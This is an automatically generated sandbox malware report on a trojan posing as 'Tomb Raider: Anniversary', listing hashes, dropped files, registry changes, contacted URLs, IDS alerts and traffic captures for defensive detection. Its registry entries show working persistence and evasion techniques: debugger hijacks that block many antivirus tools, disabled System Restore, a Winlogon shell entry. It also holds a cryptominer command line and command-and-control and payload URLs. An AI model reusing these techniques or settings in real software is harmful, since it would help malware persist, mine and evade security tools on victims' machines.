Trojan.MSIL.Bladabindi.2_cd8552c36a

by malwarelabrobot on May 12th, 2014 in Malware Descriptions.

Trojan.MSIL.Citron.ks (Kaspersky), Trojan.GenericKD.1607040 (B) (Emsisoft), Trojan.GenericKD.1607040 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: cd8552c36a49c885054202b0ec31b79a
SHA1: 72600be5c1ad5d2e1aa6a4ccaf0ff336b454d562
SHA256: c489131bea17df0bb57ff25187313adee776b8fe9655205f53ded82700a12420
SSDeep: 6144:wpMvLP3P8CzGNErLTIdVAysdEM8WLDH2 fGMMcHrxmVWI0y12lh8hIpSchJ7dX:Qa/kCzaEfoAP0cHlfGMMcHi70y12lhOC
Size: 385024 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-03-12 16:02:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WScript.exe:2280
WScript.exe:3524
wuauclt.exe:304
cvtres.exe:2696
cvtres.exe:3396
vbc.exe:1128
vbc.exe:2912
vbc.exe:2688
vbc.exe:3780
vbc.exe:672

The Trojan injects its code into the following process(es):

cvtres.exe:3500
nt32.exe:1324
%original file name%.exe:1180
63462.exe:2876

File activity

The process wuauclt.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process nt32.exe:1324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
C:\NTKernel\load32 (7972 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
%Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
%Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
C:\NTKernel\63462.exe (32324 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)

The process %original file name%.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\load32.vbs (901 bytes)
%System%\wbem\Logs\wbemprox.log (75 bytes)
C:\NTKernel\nt32.exe (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\load32.vbs (0 bytes)

Registry activity

The process WScript.exe:2280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 14 2C B3 A3 65 26 38 5D 96 96 55 38 67 53 E1"

The process WScript.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E 1D 6F F9 83 AC 69 97 A6 1C 3E A6 6D 90 C0 9F"

The process cvtres.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A3 2D 47 C1 E2 08 0E FC 2D 80 E2 A5 3A 7A 68"

The process cvtres.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB 5A D0 36 4C BB 93 51 22 AB 3A 65 67 42 E4 A8"

The process nt32.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"63462.exe" = "Tomb Raider: Anniversary"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt32.exe]
"DisableExceptionChainValidation" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 E6 AC A4 EE E6 B0 25 8B D7 E9 23 36 50 A7 73"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"load" = "C:\NTKernel\nt32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "%Documents and Settings%\%current user%\My Documents\315load32.exe"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"

"VMware User Process"

"VMware Tools"

"Adobe ARM"

"SunJavaUpdateSched"

"Adobe Reader Speed Launcher"

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"

The process vbc.exe:1128 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 E9 8C 2D 08 26 25 91 07 6C A3 FC DB 92 73 2D"

The process vbc.exe:2912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 5E 81 E2 3D E2 41 6E FF C5 45 84 4D D0 18 17"

The process vbc.exe:2688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 1F 91 3E 35 F5 77 A1 B8 AD 93 DC 0F 62 D3 E0"

The process vbc.exe:3780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 97 A3 BC CF 7F 1D 71 8F 2F EB 51 47 90 7B 36"

The process vbc.exe:672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 88 86 FB A4 8F 14 18 46 E6 B8 8C 49 C6 3E AF"

The process %original file name%.exe:1180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"REG_DWORD" = "1"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"bk" = "active"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\NTKernel]
"nt32.exe" = "Tomb Raider: Anniversary"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A FD 36 BB E0 02 ED BB E3 30 CF 4B FB CA F4 2E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\VB and VBA Program Settings\Microsoft\Sysinternals]
"Version" = "-a scrypt -o stratum tcp://ltc.give-me-coins.com:3333 -O cbbamd.CPU:1234 -t THREADS"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The following service is disabled:

[HKLM\System\CurrentControlSet\Services\Schedule]
"Start" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NT Kernel Service"

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Microsoft"

The process 63462.exe:2876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 7B 99 8F 38 65 F9 35 65 2D C5 64 2B 0F E3 1F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

Dropped PE files

MD5 File path
67f5238229333c061092f5a32e8c2ee1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\svchost.exe
e4f7c0be34da7869241a69d2ff932843 c:\NTKernel\63462.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Eidos Inc.
Product Name: Tomb Raider: Anniversary
Product Version: 1.0.9
Legal Copyright: Copyright (C) 2007 Eidos Inc.
Legal Trademarks: Crystal Dynamics(R), the Crystal Dynamics(R) logo and the Eidos(R) logo are registered trademarks of the Eidos Group of Companies
Original Filename: FlvPlayer.exe
Internal Name: FlvPlayer.exe
File Version: 1.0.9
File Description: Tomb Raider: Anniversary
Comments: Tomb Raider: Anniversary
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 261812 262144 5.20951 73fb6f02c868f34b09ac3c9e87b325a8
.rsrc 270336 118784 118784 4.34853 616065ae9776e72156a40aa493baa087
.reloc 393216 12 512 0.070639 f2d0169b522fda54bd2715b38c473014

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://popdown.me/wordpress/1/gate.php 149.255.37.187
hxxp://ge.tt/api/1/files/9a2RqWN1/0/blob?download 79.125.123.149
hxxp://open.ge.tt/1/files/9a2RqWN1/0/blob?download
hxxp://s3-3-w.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798
hxxp://ge.tt/api/1/files/6bcJvOg1/0/blob?download 79.125.123.149
hxxp://open.ge.tt/1/files/6bcJvOg1/0/blob?download
hxxp://ec2-54-217-102-175.eu-west-1.compute.amazonaws.com/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download
hxxp://e6845.ce.akamaiedge.net/pca3-g2.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2009-2.crl
hxxp://e6845.ce.akamaiedge.net/pca3-g5.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2010.crl
hxxp://a26.ms.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798 176.32.109.121
hxxp://crl.verisign.com/pca3-g5.crl 23.37.37.163
hxxp://csc3-2009-crl.verisign.com/CSC3-2009.crl 23.37.37.163
hxxp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download 54.247.122.87
hxxp://w013064.blob2.ge.tt/streams/6bcJvOg1/63462.exe?sig=-UXpeL0WanQIYatmLOL4OmQyO4lMnb17DsM&type=download 54.217.102.175
hxxp://crl.verisign.com/pca3-g2.crl 23.37.37.163
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl 23.37.37.163
hxxp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download 54.247.122.87
hxxp://csc3-2009-2-crl.verisign.com/CSC3-2009-2.crl 23.37.37.163
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 212.30.134.177
ltc.give-me-coins.com 66.85.187.133


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN W32.Blackshades/Shadesrat Backdoor CnC Beacon
ET POLICY W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message
ET POLICY W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response

Traffic

GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 12 Mar 2014 05:29:31 GMT
Accept-Ranges: bytes
ETag: "806f4cbb43dcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=11504
Date: Sun, 11 May 2014 03:57:55 GMT
Connection: keep-alive
X-CCC: RU
X-CID: 2
1401CF3DB40B609892HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modi
fied: Wed, 12 Mar 2014 05:29:31 GMT..Accept-Ranges: bytes..ETag: "806f
4cbb43dcf1:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Conte
nt-Length: 18..Cache-Control: max-age=11504..Date: Sun, 11 May 2014 03
:57:55 GMT..Connection: keep-alive..X-CCC: RU..X-CID: 2..1401CF3DB40B6
09892..



GET /api/1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://w524017.open.ge.tt/1/files/9a2RqWN1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w524017.open.ge.t
t/1/files/9a2RqWN1/0/blob?download..Connection: keep-alive..Transfer-E
ncoding: chunked..0......


GET /api/1/files/6bcJvOg1/0/blob?download HTTP/1.1


Host: ge.tt


HTTP/1.1 307 Temporary Redirect
location: hXXp://w269456.open.ge.tt/1/files/6bcJvOg1/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://w269456.open.ge.t
t/1/files/6bcJvOg1/0/blob?download..Connection: keep-alive..Transfer-E
ncoding: chunked..0..



GET /1/files/9a2RqWN1/0/blob?download HTTP/1.1
Host: w524017.open.ge.tt
Connection: Keep-Alive


HTTP/1.1 307 Temporary Redirect
location: hXXp://s3.kkloud.com.s3.amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798
connection: keep-alive
transfer-encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXp://s3.kkloud.com.s3.
amazonaws.com/gett/9a2RqWN1/CPUMiner.files?response-content-dispositio
n=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=qD9RH/
IX4s2iZULzsbyWAN3tBVs=&Expires=1399780798..connection: keep-alive..t
ransfer-encoding: chunked..0..



GET /CSC3-2009-2.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2009-2-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "ca32618c4340c20d208aad10883a84d6:1399755910"
Last-Modified: Sat, 10 May 2014 21:05:10 GMT
Accept-Ranges: bytes
Content-Length: 37283
Date: Sun, 11 May 2014 03:57:54 GMT
Connection: keep-alive
Content-Type: application/pkix-crl
0...0......0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0
...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.v
